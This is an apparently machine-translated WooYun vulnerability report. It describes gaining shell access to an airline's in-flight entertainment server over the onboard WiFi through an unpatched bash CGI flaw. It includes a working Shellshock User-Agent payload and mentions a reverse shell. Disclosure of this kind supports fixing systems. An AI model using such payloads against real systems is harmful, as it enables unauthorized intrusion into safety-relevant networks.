漏洞标题 可以控制深航的车载系统获取服务器权限 相关制造商 深圳航空 漏洞作者 Smilent 提交时间 2016-05-05 08: 41 公共时间 2016-06-19 14: 20 漏洞类型 系统/服务补丁不及时 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 连接到机器上的WIFI后,您可以获得内联网IP 192.168.3。* 板载娱乐平台ip为192.168.3.1/192.168.2.99,有两个网卡。 发现漏洞主机,有cgi远程命令执行。您可以直接退回shell并获取服务器权限。 命令可以由UA执行
查看版本
反弹shell
发现档案
有限制,但您可以通过本地代理访问phpmyadmin等。因为飞机正在下降,空乘人员告诉我要关掉电脑,我没有再往前走了。 CentOS5.5内核的服务器版本为2.6.18-194,应该可以授权。由于时间问题,它是深入的。 漏洞证明: GET/cgi-bin/test-cgi HTTP/1.1 主机: 192.168.3.1: 8080 代理连接:保持活动状态 接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8 升级 - 不安全请求: 1 用户代理:(){忽略; }; echo Content-Type: text/plain;回声;回声;/bin/uname -a; Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh; q=0.8,en; Q=0.6 Cookie: PHPSESSID=cb49943gkbpjccfgogfjc7m8u4 修理计划: 升级bash 版权声明:请注明出处。 Smilent @乌云